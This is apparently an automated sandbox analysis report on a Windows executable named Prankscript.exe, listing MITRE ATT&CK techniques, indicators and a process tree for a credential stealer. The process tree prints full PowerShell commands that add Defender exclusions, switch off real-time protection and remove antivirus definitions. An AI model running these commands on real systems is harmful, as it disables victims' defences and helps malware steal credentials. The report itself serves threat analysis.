d576e30d35b148d752401bcba75fb935e38c2a9ae9ff07cd1c9c6fdb209c4ca3

Analysis

max time kernel
298s
max time network
301s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
05-10-2024 00:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Prankscript.exe
Size

69.0MB
MD5

8be83b5e08807bd5dce6a7585404da1a
SHA1

0d7eb7fd9db3c5f95c59d013baeeb47823d233fb
SHA256

d576e30d35b148d752401bcba75fb935e38c2a9ae9ff07cd1c9c6fdb209c4ca3
SHA512

69ddec2cae5a0b37dbd327d63c08213e0f01aea91d43bf8d5ae2bd0d73617ca77c7a0831b590d2cb6b26b2bc986a328d6869cbc8828b0debe9f42b35662646c5
SSDEEP

196608:lBUU+sxfo2y8urErvI9pWjgU1DEzx7sKL/s1tPAkjUWlRHKq:dXxfo38urEUWjhEhn01tl9Kq

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
988	powershell.exe
2552	powershell.exe
4680	powershell.exe
4216	powershell.exe
3948	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4964	cmd.exe
4400	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2372	bound.exe
3376	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe
3480	Prankscript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
87	discord.com
7	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2448	tasklist.exe
5028	tasklist.exe
4568	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3184	cmd.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000100000002aa00-22.dat	upx
behavioral1/memory/3480-26-0x00007FF8E1800000-0x00007FF8E1ED9000-memory.dmp	upx
behavioral1/files/0x000100000002a9f2-29.dat	upx
behavioral1/memory/3480-31-0x00007FF8F73D0000-0x00007FF8F73F5000-memory.dmp	upx
behavioral1/files/0x000100000002a9fe-30.dat	upx
behavioral1/files/0x000100000002a9f9-49.dat	upx
behavioral1/memory/3480-50-0x00007FF8FCCC0000-0x00007FF8FCCCF000-memory.dmp	upx
behavioral1/files/0x000100000002a9f8-48.dat	upx
behavioral1/files/0x000100000002a9f7-47.dat	upx
behavioral1/files/0x000100000002a9f6-46.dat	upx
behavioral1/files/0x000100000002a9f5-45.dat	upx
behavioral1/files/0x000100000002a9f4-44.dat	upx
behavioral1/files/0x000100000002a9f3-43.dat	upx
behavioral1/files/0x000200000002a9f1-42.dat	upx
behavioral1/files/0x000100000002aa05-41.dat	upx
behavioral1/files/0x000100000002aa04-40.dat	upx
behavioral1/files/0x000100000002aa03-39.dat	upx
behavioral1/files/0x000100000002a9ff-36.dat	upx
behavioral1/files/0x000100000002a9fd-35.dat	upx
behavioral1/memory/3480-56-0x00007FF8F6560000-0x00007FF8F658D000-memory.dmp	upx
behavioral1/memory/3480-58-0x00007FF8F7F80000-0x00007FF8F7F99000-memory.dmp	upx
behavioral1/memory/3480-60-0x00007FF8F6530000-0x00007FF8F6554000-memory.dmp	upx
behavioral1/memory/3480-62-0x00007FF8F3410000-0x00007FF8F3586000-memory.dmp	upx
behavioral1/memory/3480-64-0x00007FF8F7E90000-0x00007FF8F7EA9000-memory.dmp	upx
behavioral1/memory/3480-66-0x00007FF8F76B0000-0x00007FF8F76BD000-memory.dmp	upx
behavioral1/memory/3480-68-0x00007FF8F64F0000-0x00007FF8F6523000-memory.dmp	upx
behavioral1/memory/3480-72-0x00007FF8E1800000-0x00007FF8E1ED9000-memory.dmp	upx
behavioral1/memory/3480-76-0x00007FF8F73D0000-0x00007FF8F73F5000-memory.dmp	upx
behavioral1/memory/3480-75-0x00007FF8E12D0000-0x00007FF8E17F9000-memory.dmp	upx
behavioral1/memory/3480-82-0x00007FF8F63B0000-0x00007FF8F63BD000-memory.dmp	upx
behavioral1/memory/3480-85-0x00007FF8F2F40000-0x00007FF8F305B000-memory.dmp	upx
behavioral1/memory/3480-84-0x00007FF8F7F80000-0x00007FF8F7F99000-memory.dmp	upx
behavioral1/memory/3480-78-0x00007FF8F73B0000-0x00007FF8F73C4000-memory.dmp	upx
behavioral1/memory/3480-81-0x00007FF8F6560000-0x00007FF8F658D000-memory.dmp	upx
behavioral1/memory/3480-73-0x00007FF8F3060000-0x00007FF8F312D000-memory.dmp	upx
behavioral1/memory/3480-173-0x00007FF8F6530000-0x00007FF8F6554000-memory.dmp	upx
behavioral1/memory/3480-222-0x00007FF8F3410000-0x00007FF8F3586000-memory.dmp	upx
behavioral1/memory/3480-284-0x00007FF8F7E90000-0x00007FF8F7EA9000-memory.dmp	upx
behavioral1/memory/3480-297-0x00007FF8F64F0000-0x00007FF8F6523000-memory.dmp	upx
behavioral1/memory/3480-299-0x00007FF8F3060000-0x00007FF8F312D000-memory.dmp	upx
behavioral1/memory/3480-319-0x00007FF8E12D0000-0x00007FF8E17F9000-memory.dmp	upx
behavioral1/memory/3480-321-0x00007FF8F73D0000-0x00007FF8F73F5000-memory.dmp	upx
behavioral1/memory/3480-334-0x00007FF8F2F40000-0x00007FF8F305B000-memory.dmp	upx
behavioral1/memory/3480-320-0x00007FF8E1800000-0x00007FF8E1ED9000-memory.dmp	upx
behavioral1/memory/3480-326-0x00007FF8F3410000-0x00007FF8F3586000-memory.dmp	upx
behavioral1/memory/3480-335-0x00007FF8E1800000-0x00007FF8E1ED9000-memory.dmp	upx
behavioral1/memory/3480-349-0x00007FF8F2F40000-0x00007FF8F305B000-memory.dmp	upx
behavioral1/memory/3480-360-0x00007FF8F3060000-0x00007FF8F312D000-memory.dmp	upx
behavioral1/memory/3480-359-0x00007FF8F64F0000-0x00007FF8F6523000-memory.dmp	upx
behavioral1/memory/3480-358-0x00007FF8F76B0000-0x00007FF8F76BD000-memory.dmp	upx
behavioral1/memory/3480-357-0x00007FF8F7E90000-0x00007FF8F7EA9000-memory.dmp	upx
behavioral1/memory/3480-356-0x00007FF8F3410000-0x00007FF8F3586000-memory.dmp	upx
behavioral1/memory/3480-355-0x00007FF8F6530000-0x00007FF8F6554000-memory.dmp	upx
behavioral1/memory/3480-354-0x00007FF8F7F80000-0x00007FF8F7F99000-memory.dmp	upx
behavioral1/memory/3480-353-0x00007FF8F6560000-0x00007FF8F658D000-memory.dmp	upx
behavioral1/memory/3480-352-0x00007FF8FCCC0000-0x00007FF8FCCCF000-memory.dmp	upx
behavioral1/memory/3480-351-0x00007FF8F73D0000-0x00007FF8F73F5000-memory.dmp	upx
behavioral1/memory/3480-350-0x00007FF8E12D0000-0x00007FF8E17F9000-memory.dmp	upx
behavioral1/memory/3480-348-0x00007FF8F63B0000-0x00007FF8F63BD000-memory.dmp	upx
behavioral1/memory/3480-347-0x00007FF8F73B0000-0x00007FF8F73C4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2500	cmd.exe
1164	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3804	cmd.exe
1744	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2180	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2992	systeminfo.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2842058299-443432012-2465494467-1000\{F82D6560-434E-4C27-9031-559A0622E3E7}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1164	PING.EXE

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
4680	powershell.exe
988	powershell.exe
2552	powershell.exe
4680	powershell.exe
4680	powershell.exe
988	powershell.exe
988	powershell.exe
4400	powershell.exe
4400	powershell.exe
2552	powershell.exe
2552	powershell.exe
3192	powershell.exe
3192	powershell.exe
3192	powershell.exe
4400	powershell.exe
4216	powershell.exe
4216	powershell.exe
1040	powershell.exe
1040	powershell.exe
3948	powershell.exe
3948	powershell.exe
4064	powershell.exe
4064	powershell.exe
3164	msedge.exe
3164	msedge.exe
2128	msedge.exe
2128	msedge.exe
4980	msedge.exe
4980	msedge.exe
4872	identity_helper.exe
4872	identity_helper.exe
1028	msedge.exe
1028	msedge.exe
2512	msedge.exe
2512	msedge.exe
2512	msedge.exe
2512	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	2448	tasklist.exe
Token: SeDebugPrivilege	5028	tasklist.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeIncreaseQuotaPrivilege	4448	WMIC.exe
Token: SeSecurityPrivilege	4448	WMIC.exe
Token: SeTakeOwnershipPrivilege	4448	WMIC.exe
Token: SeLoadDriverPrivilege	4448	WMIC.exe
Token: SeSystemProfilePrivilege	4448	WMIC.exe
Token: SeSystemtimePrivilege	4448	WMIC.exe
Token: SeProfSingleProcessPrivilege	4448	WMIC.exe
Token: SeIncBasePriorityPrivilege	4448	WMIC.exe
Token: SeCreatePagefilePrivilege	4448	WMIC.exe
Token: SeBackupPrivilege	4448	WMIC.exe
Token: SeRestorePrivilege	4448	WMIC.exe
Token: SeShutdownPrivilege	4448	WMIC.exe
Token: SeDebugPrivilege	4448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4448	WMIC.exe
Token: SeRemoteShutdownPrivilege	4448	WMIC.exe
Token: SeUndockPrivilege	4448	WMIC.exe
Token: SeManageVolumePrivilege	4448	WMIC.exe
Token: 33	4448	WMIC.exe
Token: 34	4448	WMIC.exe
Token: 35	4448	WMIC.exe
Token: 36	4448	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4448	WMIC.exe
Token: SeSecurityPrivilege	4448	WMIC.exe
Token: SeTakeOwnershipPrivilege	4448	WMIC.exe
Token: SeLoadDriverPrivilege	4448	WMIC.exe
Token: SeSystemProfilePrivilege	4448	WMIC.exe
Token: SeSystemtimePrivilege	4448	WMIC.exe
Token: SeProfSingleProcessPrivilege	4448	WMIC.exe
Token: SeIncBasePriorityPrivilege	4448	WMIC.exe
Token: SeCreatePagefilePrivilege	4448	WMIC.exe
Token: SeBackupPrivilege	4448	WMIC.exe
Token: SeRestorePrivilege	4448	WMIC.exe
Token: SeShutdownPrivilege	4448	WMIC.exe
Token: SeDebugPrivilege	4448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4448	WMIC.exe
Token: SeRemoteShutdownPrivilege	4448	WMIC.exe
Token: SeUndockPrivilege	4448	WMIC.exe
Token: SeManageVolumePrivilege	4448	WMIC.exe
Token: 33	4448	WMIC.exe
Token: 34	4448	WMIC.exe
Token: 35	4448	WMIC.exe
Token: 36	4448	WMIC.exe
Token: SeDebugPrivilege	4568	tasklist.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeIncreaseQuotaPrivilege	2320	WMIC.exe
Token: SeSecurityPrivilege	2320	WMIC.exe
Token: SeTakeOwnershipPrivilege	2320	WMIC.exe
Token: SeLoadDriverPrivilege	2320	WMIC.exe
Token: SeSystemProfilePrivilege	2320	WMIC.exe
Token: SeSystemtimePrivilege	2320	WMIC.exe
Token: SeProfSingleProcessPrivilege	2320	WMIC.exe
Token: SeIncBasePriorityPrivilege	2320	WMIC.exe
Token: SeCreatePagefilePrivilege	2320	WMIC.exe
Token: SeBackupPrivilege	2320	WMIC.exe
Token: SeRestorePrivilege	2320	WMIC.exe
Token: SeShutdownPrivilege	2320	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe

Suspicious use of SendNotifyMessage 44 IoCs

pid	Process
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe
2128	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4476	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2864 wrote to memory of 3480	2864	Prankscript.exe	79
PID 2864 wrote to memory of 3480	2864	Prankscript.exe	79
PID 3480 wrote to memory of 2004	3480	Prankscript.exe	80
PID 3480 wrote to memory of 2004	3480	Prankscript.exe	80
PID 3480 wrote to memory of 796	3480	Prankscript.exe	81
PID 3480 wrote to memory of 796	3480	Prankscript.exe	81
PID 3480 wrote to memory of 3332	3480	Prankscript.exe	82
PID 3480 wrote to memory of 3332	3480	Prankscript.exe	82
PID 3480 wrote to memory of 2608	3480	Prankscript.exe	83
PID 3480 wrote to memory of 2608	3480	Prankscript.exe	83
PID 3480 wrote to memory of 3184	3480	Prankscript.exe	84
PID 3480 wrote to memory of 3184	3480	Prankscript.exe	84
PID 796 wrote to memory of 4680	796	cmd.exe	90
PID 796 wrote to memory of 4680	796	cmd.exe	90
PID 2004 wrote to memory of 988	2004	cmd.exe	91
PID 2004 wrote to memory of 988	2004	cmd.exe	91
PID 3184 wrote to memory of 4976	3184	cmd.exe	92
PID 3184 wrote to memory of 4976	3184	cmd.exe	92
PID 3480 wrote to memory of 1752	3480	Prankscript.exe	93
PID 3480 wrote to memory of 1752	3480	Prankscript.exe	93
PID 3480 wrote to memory of 2012	3480	Prankscript.exe	94
PID 3480 wrote to memory of 2012	3480	Prankscript.exe	94
PID 2608 wrote to memory of 2372	2608	cmd.exe	97
PID 2608 wrote to memory of 2372	2608	cmd.exe	97
PID 1752 wrote to memory of 2448	1752	cmd.exe	98
PID 1752 wrote to memory of 2448	1752	cmd.exe	98
PID 3332 wrote to memory of 2552	3332	cmd.exe	99
PID 3332 wrote to memory of 2552	3332	cmd.exe	99
PID 2012 wrote to memory of 5028	2012	cmd.exe	100
PID 2012 wrote to memory of 5028	2012	cmd.exe	100
PID 3480 wrote to memory of 4324	3480	Prankscript.exe	101
PID 3480 wrote to memory of 4324	3480	Prankscript.exe	101
PID 3480 wrote to memory of 4964	3480	Prankscript.exe	103
PID 3480 wrote to memory of 4964	3480	Prankscript.exe	103
PID 3480 wrote to memory of 1164	3480	Prankscript.exe	104
PID 3480 wrote to memory of 1164	3480	Prankscript.exe	104
PID 2372 wrote to memory of 2376	2372	bound.exe	106
PID 2372 wrote to memory of 2376	2372	bound.exe	106
PID 3480 wrote to memory of 4552	3480	Prankscript.exe	107
PID 3480 wrote to memory of 4552	3480	Prankscript.exe	107
PID 3480 wrote to memory of 3804	3480	Prankscript.exe	109
PID 3480 wrote to memory of 3804	3480	Prankscript.exe	109
PID 3480 wrote to memory of 3836	3480	Prankscript.exe	112
PID 3480 wrote to memory of 3836	3480	Prankscript.exe	112
PID 4324 wrote to memory of 4448	4324	cmd.exe	115
PID 4324 wrote to memory of 4448	4324	cmd.exe	115
PID 3480 wrote to memory of 2180	3480	Prankscript.exe	116
PID 3480 wrote to memory of 2180	3480	Prankscript.exe	116
PID 3836 wrote to memory of 2992	3836	cmd.exe	118
PID 3836 wrote to memory of 2992	3836	cmd.exe	118
PID 4964 wrote to memory of 4400	4964	cmd.exe	119
PID 4964 wrote to memory of 4400	4964	cmd.exe	119
PID 4552 wrote to memory of 3560	4552	cmd.exe	120
PID 4552 wrote to memory of 3560	4552	cmd.exe	120
PID 1164 wrote to memory of 4568	1164	cmd.exe	121
PID 1164 wrote to memory of 4568	1164	cmd.exe	121
PID 2180 wrote to memory of 3192	2180	cmd.exe	122
PID 2180 wrote to memory of 3192	2180	cmd.exe	122
PID 3804 wrote to memory of 1744	3804	cmd.exe	123
PID 3804 wrote to memory of 1744	3804	cmd.exe	123
PID 3480 wrote to memory of 2328	3480	Prankscript.exe	141
PID 3480 wrote to memory of 2328	3480	Prankscript.exe	141
PID 2328 wrote to memory of 3320	2328	cmd.exe	126
PID 2328 wrote to memory of 3320	2328	cmd.exe	126

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4976	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
"C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2864
- C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
  "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2372
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6810.tmp\6811.tmp\6812.vbs //Nologo
        5⤵
        
        PID:2376
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:2736
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=IQDWOHB_kpI
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f2b23cb8,0x7ff8f2b23cc8,0x7ff8f2b23cd8
        7⤵
        
        PID:5016
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1992 /prefetch:2
        7⤵
        
        PID:1672
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
        7⤵
        
        PID:3568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
        7⤵
        
        PID:1220
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
        7⤵
        
        PID:3376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
        7⤵
        
        PID:3092
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
        7⤵
        
